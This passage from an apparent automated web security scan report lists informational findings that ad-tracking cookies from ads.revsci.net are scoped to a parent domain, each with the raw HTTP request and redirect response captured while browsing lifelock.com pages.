Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lD0KtGD3t3zJfAqSy7Ec+8jGrfYp2WrTIRBqQ2OYuGWvze9j97z84TKAm1hb+FYIeamrF7K3Y1U8cGnXlXYGdQ/ngZ1luxj4l5as0KWw8B/yHhecjeZxoBUgnlB9GGHds8iQ/lnD3CR6WbZRy9PSMpX+6P2ubEDqr/IzdGDFeuxZul/JIUDpzdkA4EDkpPIbbFCSQSiXXDjzePVUVZGf7FH5Cxs//mM3K27NhBC371tUVKzH9FhGzqzuOVZpru06aa+wPhMeRB5qAXv4sVXRaZ1aJAq6k8g6SDvSPA2fHzkJfkvAwwakUkQUZPeyPOhARMt8J603jd60Q0TZjNXm8n+ks8dmg/qHE59bvRu1VRFCXiyzxA5jei4OZ4GoHBxavijC19ccaSaYGorSYi9v6Aq/DAJlKl3/UlHWXaRjJ226qmZ3rV0klB7I59RlBabm80OBvfxQ7fQE6SdhWnr9yhS3MyaPTeqAm2s9zv7oDblD5CNIG0rMwmxJc8wbakCGy6Evw2blZVaFs3q20wjMrqx67u5JPJk1/0kVkz+0TrWgXyJH97VEkiZ3H1SifbYYOZRrLHL+mr5GuWBwkY9F7vZGJK6H6CGPsNQPzkGHGQP5en5uUKG5C+2lSuIKhalpCV2gGr6MHD5vwt2RlHtoZoP5PV4xKD850cklZV1LeWGQ1u3MGMb8bfxuh+YxPs7mkCI3jMpB5SEaJ3JVLMSCVj4XQyCZ7gFE3OuwaLWOfawXUG2mxdiKsKlKrAFBxKNU1/ekU2GrMxBaGUSrd07wjWgzb5qCoyLfHN4I6aYeMzSiG7awfcef4Is1yheJuURrfdX1XI+TNu8RfdOs4V2HRhiTZGuH0G+/YPneAcl3TANQ90zt55RzVrRr1261eFkFrD92xMPFNSelGO9RutJqh1z6dZzpvwvFx+6wRfSN9RQINf7eNubGZj0j9rCcyhZkNhf14C5I0erC+gSzAznl6NO7EYVNhjBPi3WQwvPIDgKptQ3rpbT/5h+VL1lJaRShQ1Si"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 16:02:35 GMT


17.21. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/leadership/management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_btY7="MLsXr98vcS5joAC3cWnZbLu/LxacmO6l/ARkBxpP1JJrJebK5u0oIec5hQtxppxsRjkmyEG97JGtnHKzbcarrWXvOcKbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR30Ociq0ao4q/grq6lsLC0KtAAADMs0buh6LSM9MG0LIcGHe70yIHgew/Eh0uLc+4c/4njp7GcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Lk2j36bu66uGkRrS4CsiWzoeFXOeaMh4yHFMNx7MqLYBUYmEVrbUD55ScTBefUUF0U4E7w5UEa9kMK7iC9gTmt3xw0L/2hRO9SwVqZNP64GcOJoZDuIezY3VtCazAUM7wNTb7K0tPc0/B538LlHHOIWHyDI6Pcx"; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hifjv2rR/V4c+8rGrfYpD4E7DYk/sDOMiD26ze9j90z9N83XdjZt9ZtbR0ijMugza0Qe5pDvWTr6P4O2VQdjPWf6987WWc8u5KEGwpBscqKQZ1BB2LCvdm6n578p4Rvu6q0mDJHnkT/2jbqILCYLacH0wg0BO/PRs5ivndkckUxb3rhBm6zdK7VzeQeU44tgNRzskkGjN35lToNd85zTK6Vj+9BBbxpbelASsgX6/CR8Y5xVC8aI0ZxOO9+xP1LJ2VtAHTZTiV00au+sbBtvKMxT926tMzK0H5cwsw+g/cYgBE0rDkLsCjUxh6FLjC7i6EMGwHUbcgJhoCDKlItJyK8FU8pMQoukW4Ksl1ZOpqZ7GC0HHNVqD6t3U32r9sbTyZkKK+QA8JjzMDrdR4tTUP2OU1HeXuSVxv1yl+5/L2aqQXy3rE21OIbAG0Txff9Q6+QE4SRR2rr8yhSPM8aOTW2BlGO/zv4pDbki5ENYG1rAwHxPcsScK1CIu7nP426FZdWFs4e21wjcqJyCbd5JPJ40ccpki7u1RrKAV+CG6LFFkj53H1SCrbYfOIRrLfH5rh4eL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2h2r6MHc5Pzt36KPxeMWOL5008JyU50uBQkV+DdYK4Gk+NchyAu4bzHS5mv/nQZXciumcSgzF8+UUvGNyoCfGNhSTai5t86Aacd0zjGzqDaj+g6z+b8nem9ZIkW8qaa0CMbJFNkcqd6zbZHfm4bwKc4OXmjNFwXw/aqQPgXGZdNiAABShzNlnnILNvQI/L4iLNmM8NLZISUdj8Bywe/xU4CPbov0NZunyZnU87RNKIJ8ju6qLTygwGnjEmKh4STE2cZsDOvcNSCTjfRSj9TWHSYPlOxGSR3K91I2CEvVf/GjySVjhJlm3bhym+JGHVNPjKwzs0PgWWBuKLIQBlJoyq1iJREoGQ2gRM+eiMu3rkpU9zbDFvwNQMS8je4aRvBwY="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_f0-W="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVa5tqbfn/gBxYTeR02M2pSI8HR/ZfycAkbv/sDi9oySDDVp8H1BGXR3mIUBTO7FKiNbMke6vxBxCHU3H1o3TjA9xAN/W2fhrOqqGOw8C0qJAVmkXkdeVE7e0ejAJJ6HYYr7xC6Td58SGhALqjGJZwEN75CrLUsT4+Hzl5viSAFnI10jBinOo8ffl6vFjB/o0L1JNa/08FxWUp4CjxpsDaYpsY4Am5miDNP1KfB4UPjRwpkqxQ7FuRkQUKXgs11CqcjjGVzv3rkYig4aSw8VHmZ9t2ZFq2vFiY7rz2Ih8eifoUijie6EymXBguDwcPA4SNFV/B3bqofNbcpLSklSaW8DaoITTktjus8RrWDX2Zw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJE2jMAYU1Q2ENhuq3vIHtebrqMSpxsBz2o206rx7XdHqk2MHqYoAOld9rYtu+8u94QGhvrJf//mchCGk4X4xYR9YkhtFwZ+EHmvWXwanym+SKowdMgpK+G3TxpdT0+UgCZvwumkbf9vr4fQdGiwg6WnLAVuwjfo+LLfarQ046Iln78U+3J6ljUNMRuOkdO9Mnnyv8Ph4raozCmp2JrF/M/a1XxqZbKwuxtKGBsXCeINuvT1Dwg0YZ75iZNBoLOjf8W13Zl4CJC36Z4XiPuYYx7VVLswcQ1f1IUpRi0tVP1zSjeXFcN+1/w1gmA6W6CqbcuheULZAHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbLvbNT3fMCvtaDXIyrPwkoF8w6lNfTOtYtQFAz/IV4IPJWrD4KNtBKX22t0hxAm0v8J+kyCJ5ZzeQHic0omqoQI7nLtu10sFOz45YNec6XtAETkLs4MrS7FQ3IH3RPl9RghFVFL7AEBmZE6MLJb8R6Ojt6pNENLP0GFYiwm4TFb2SKn/BmuPGX+RQ53Pf3GEKvM6HCcOInSycBShfBaMhcAq/KXvUNyqcAH2V8YfjH3lKrXOpuTKlHgZTGmttlgL0VyX7DTMGfmjw5nw6zHe7h8/H5H1l0favdnkJI76/bA6W84/9aDU/Cl809vV+3f2eyldWLQwoKFaZn+cIoqtfx2xIyakfHxpK8WAJkNdJ/VnFZyKF2DzG99kicoZ19MRVVbFwfqwTyhIimN8HHGPaSdQqgrwOHKiGXAhVX7/9fojrdQmDpupJa/BnCDIM7bCV0xp2fXSEZFMoYFwJ/qKWGcdsTyzJzWgNNbMS4vq0nzsOFGgWuDDtcNdhnLcctVF7u9hBNQrtjPyNsYMBUdSYwUDEeR6PfA3KWx0Po7RAH1AiSzp4GWpRWkyFeQ2C1zx0IhQBeU/EMbnxLCIswaO/RDRMb7kEpKawwdPrfxayZYVWUqsn2gWHlnEx77G9qbp8u1ERAyiijHe7S3pCw34KPEgWMPlsbqqkw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:16:55 GMT


17.22. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/guarantee/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_08a3="MLsXr98vcS5joAD3cWnZbLvzpTlezxNylzFx7q/7jh3vp9AaQ0d9+wVZvXtwppxsRjnJOn0JoHY7lXcFYbXvZnisO8Kbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR20eaiqkaJwhTlwH++6Z4X48stfLiOo0Zv7eZb+2clznY/XzKBno82ZgospsTFZgqAkc+h9+RA1aOek/YZTiBPWcG8lxtS0MQbQ1AxRVuZ5/Dmeu4ZtqBBkQVG6QqB6fzKO50TmI/N5dJnTC6m0qVVRRn9lA5ZLkLkTMtQersUCMxy1hxMqLYBUYmEVrbUD55ScTBefUUF0U4kL87UEW98MK7iC9gTmt3xw0L/2hRO9SwVqZNP65sCLrj40ceeKvQ/DkXPEe2IlDjeemAsvvBr1HmQXiTUz873vQ96+E="; rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHteb7JxbCW7w++Pj1nwUVKp5hF8UbcYsAOiWvx6cDR9HtHH40iVodTNtchSGk4X4xYR9YkhtFwZ+EHmvnSD6nym9a9EOO6FFfbKJMGot66KlgRINQareOVIA47DpDddVt41B/2lZDvlXfqypOFT8raL2+bRtNAthCPn7y62D/SpWdGxcRNgDmIj5Yi0euDif+TNGrkMusQsihmYwbmkPKGIOXvT2jwg0YZ1hhZNBoLPjfce10Zl4C3C37YYXivucYx7VVLswcQ1f1IUJRi09VP17SjeVF9/S1bz8Xog5r6JCmXM3DqOcky83D+OCzMYAFF/KlMDverAlYjk3oFt8ANMxorn1kr7DMwpy2Aw2KoPrC+TNTrdLp2/Bqfp+lC4BJQxCqT4KNlBIX2Gx8mABa0jwzO6uB73qS6cvf+3DUlwo8DAqmGo0RMDG6xbe8C+6rPaoDdfzmFCzhQnIHYZVVX9xIQL6NBtXBNNNV8vTyDR2Phl6pMIFrP0W9Ylw25QHb2CKn/BmuPGH+XfI2Pf1Gk6sLkQVKH69IMHIe41VF9WwQvvI/fl9KqcAH2V/YfzHzjJwy8w6C91pBJA5QgXszDumhol06Ym+pxvfckQLm5gctQ7KNka5eEeJvkJI7l2OAeog7kVKMU/S18/mlz9++9bxcBU5bxCzMszMlTyGA9lloJyXweA7ZMvmT99T7RSL/0Nxqnv708289oi8q//gAGnD9DCHZbnRssHjCerFLPaQdwqkBrgXbE61vt/a5QB4KKIKaXQCZFqY3nSh42s3bCVNxp+e3aEYkLgYFwG/tyH58b1816hFChMWzSO8jd0GzSOHGjkcPV/zGQXuqqJMtWozTmjQ2ukCSXf0aZ2mu3OTC04OZgOoOQt2UIjUKH5zWWG5ekz+hDMNgjVap5KdmOT3CwZjpI4zA90B1CATPC3swcaxfRCZvFIWda8pXY/95WMEdqajOSPgqXotJ1P/x8kgIOQfpJr6aSQznonK1NHQINiZqOUh8xIVemA=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_08a3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_08a3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_bhJ0="MLsXr98vcS5joAD3cWkfYUw1tIebrb2QmbdXm6j+DYZlI1D1a3Tl+WEpJX+o5AVFSd5d5ssFR9oWxtfs6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh29ZpvVrzvqSf6Tn907bJXIJ1bTRUD/N6XW+2mPaBgdy6Qo3KELseVAWAaq6P4wa46LVQp5vnrosH/Ng/dv/wp5HopVk2YhKyoWWlOUwXUI/XHrIj+eEFssu8rch61LPNWZn4aSkmVd2dXhtTy5snFiLuAWijaAQsUrJ9Z9ldVKplBpWWTQl5k//BWPZOof8fAdS04KgilPjACpIWXdG1+ZjyPTBw2JOksGDgcEossWHD46TEJ5UrDDMkV3gw5ykqcayotvrS10H59Uw7cU+yxz6zFB/a8SJJ2tZnqgX3Mw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1eFT5Ws9TLv2rR/V4c7P6C3v7mfvNoGRBqQ2Og72VXuRuum/D84TKAm1hb+FYI/dkvBZ/1510tuxXK81B4UDnngZ3Vlpgc/842Hfph7v58LNOUDQBghPJxmyBGxmmaPBTx77r/TfmIuoaAsgkkUm+Tsn1FF/6JUGd2pstXb4+t7GXFWrETtzjW87/ZK7UTsj5tzg28aqkkKW/fTYctG84K1DtatLGCwqPEsjI3/q33h7IcW8LCELnnUfaxwqmqKj3js37OEJH5EumfAisx5oE6dY3mzYaqgOAvr6G3H0VT8gQA8oaXw+iPHX2eAodHHdoaYpmT+ERLJsiANnM9Z5EFziSdC96wk7umpr95g5/jD54Hs/LzOCodFzmpHBxKTsji29M8aTaIGiqScgNvaAi6AopEUA0OUlHeXoRltrWXiapyxnvtWw0LCQVdJhSuOlTrDEN1SPrzEglIL+b92MoEdPoIfcJF/ThTCBT9xdQxi9EGsv5fR81xMW5gxAyZHZNDJHc7Ok0gLAHIl6tlAmlj44s1XVLfSb/lGmPMI8cWIjirT9v0KvN3m3EAY62T5Ybin1k+oSDHFd48PwZdo4AIxW2yiYKiriwPgI/vnDwea4BL4iinSWMGEInCp4XYtENicIV5fGaUyxhPMSTwJXdcDan+hzsJJioXllzVMPvqLRzmlP4hKMtpJECwcangXrx4sz6lpG9jGu1DsOkY7fkXKp5I8JvUVSOk9AOv9lmhe/rI7EfHtZ5GnbQCYmSiLXcdeAn3jj+SCrwuS5X+BtayaVBLrK3F9t+lkRD+3mwags4jAqgxZvcmQEtB9vfhUqoXQ1mHNrIAkZ1fn2TCAcr/t7gcjh6Sh5JA3ZCBnDsaM2MoM9gfH4lBccBqDhCgOm23sRVjyzG51dCP+KiXsOLcBOnQDAD5S4ZxSA0Up/1IIW2XXQq3Zg/PtRdY/j8qAgVT3K8QQ6Y0cukjvN4Bgxf7MtAbz8qAS6pZz5XJy9nV9L0MY8WyjLzjEZOn77piBCY="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 16:04:08 GMT


17.23. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_BFfo="MLsXr9EvcS5joBDnTrInbrvzpTlezxNylzFx7q/7jh3vp9AaQ0d9+4VlnSrvgBJz6voGf2x+1Z6RdS2pI5TjgfZ77T3M2t7X2iBHBnAKpH5maLzmozIHYGm7ZsUgnorFipEdgxPJ/VuCSUSeSzr0fhvZs1RpQ2eynAXm+ZYRA0lY99PWYzTVxA+dgG4eyEo6fI6nOFv7VETg9VbOEYxF1bxw9rxFW2/VYfto5WLdqS8AVUs4gxrGXxowSUIPPw4TaPajZMsEG9QysBpXO9+vMJzhH7J7pRXm6jp5YWVv1nqFVwl5k//RXPfOpv8fCdS04EgjnPjAmJGexMwDpJoGPjBw2JOksGDgcEossWHD46TEJ5Ur3vHnDUTUWzfCTfvl2X7FBShnd/mjEZgT/74wiYnRHCJHCNJv/RnwYw=="; rsi_us_1000000="pUMdJE+jMAYYlW2ENhuq3soHtWbj6GKPTeto2o206rx7XdHqk2MHqUdc4h3G8jE1Gdx1SeuNf4n9FXqajQPusTp1Jcs8ZjfglfknWAN/Q1IfyZw5h0t1bS95yIeZFtkPXSC2LxApOiqcQjM6vzFrEqEYTBt+vGOrPGvAgmk6EujcF1pARpPpVf1t8GJcgXgZqGCYmfomxtXdEgF5VKMZEFWBmbNUKntEp+ukrNGGBkXCmINvvD2jww0YZ7hmZNBoLNjfcex0Zl4CJC36Z4USPuYYx7VVLswcQ1f1IVJRi0dVP1rSjeVFf/+1/xUY2A6W6SqbcuheULZgHUExIivYRsyPM4kPKIi65s9jlw8b0ygRfbJv54fQ2wlpR9gVd2SFYgoO7k+RZWUd0XDMaGcg3JqM/wuDmnuWWb0A4COsclOeEQtHtMWW3/snkkNcgVm7VDJfkCm6cjOTrvlOItggKPIusbL1l9SCaB99VdIjRitqqb3WE8ef2luiUylYJxjwzBtb+QBbLiC7/pZjNWAycY5tP/aRFsAiCBupTjGYjm2g0lHMDqDrmlPMoscSYxhTTPv0KuN3m/EHY62T5Ybif1g+5CbvHd48MQZdo4gIxa2ziYKirixPgI/vnDwea4BL4iinQWN+AIncp4UYoiLCWtpcrIRtS9MgPS6DIFnjQGyv2+z+jIrmAoHMMiwl2RATjCQeV+rkFcTCsGNYksONovJdR5NKAGZWNoFpiSfZPY